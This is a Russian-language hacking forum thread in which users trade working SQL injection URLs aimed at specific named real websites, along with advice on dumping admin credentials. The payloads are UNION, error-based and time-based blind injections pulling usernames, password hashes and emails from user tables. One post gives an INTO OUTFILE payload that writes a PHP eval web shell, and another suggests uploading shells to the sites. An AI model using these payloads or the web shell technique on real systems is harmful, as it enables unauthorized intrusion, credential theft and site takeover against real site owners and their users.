Попробуй править уже существующие файлы, добавь например: <!-- БЛЕАТЬ --> Посмотри из веба, если в исходнике есть данная строка, то я хз че сказать
Пароли админов. Пути к админке, потом можно залить на те сайты шеллы, без всякого хакинга UPD. Mожет это из-за группы и овнера?
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,concat_ws(0x3a,id_member,member_name,real_name,passwd,email_address),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+smf_members--+ как быть?
Все просто, таблицы smf_members нет в текущей бд, она находиться в другой Code: http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,table_schema,6,7,8,%209,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,%2026,27,28+from+information_schema.tables+where+table_name=0x736d665f6d656d62657273+--+
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу PHP: http://www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+concat_ws(0x3a,name,email,password)+from+batterika_mysql.p_users+limit+1,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count(0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+batterika_mysql.p_users--+ таблица пуста
Обязательно они там должны быть? может это админ такой хитрый. P.S: а сам редактирует сайт через cpanel (я так думаю)
Возможно пароль админа хранится в config.php/admin.php/settings.php/etc. Как вариант, возможно, что скрипты для авторизации/регистрации подключены к другой БД. Вообщем сейчас посмотрю... UPD. Смотрим админку http://www.pitatel.ru/admin/ Code: Access denied for user 'batterika'@'localhost' (using password: NO) Нет коннекта. Смотрим текст: Code: C [B]14 июля 2011[/B] года компания Pitatel вошла в группу компаний "Баттерика"! Соответственно, сайт заброшен. БД с пассами админки не подключена...
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+ я так понял, тут нет прямого вывода?
Code: http://er-region.ru/about/department/index.php?id=13999999999999.9+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Все выводится через error-based. Смотрим исходник: Code: [Duplicate entry 'COLLATIONS1' for key 'group_key'] ---
иньекция в запросе вида SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION] есть у кого идеи как ее можно раскрутить? метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...
UNION не работает кстати после ORDER BY. Единственное, что я вижу, что можно попробовать, это Code: INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +'<?php @eval($_REQUEST[cmd]); ?>' Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало. Крутить как-то так: Code: , 100 UPD Code: SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0)); SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0)); Ток если записей много, то лучше юзать LIMIT. Что-то по типу blind sleep-based sql injection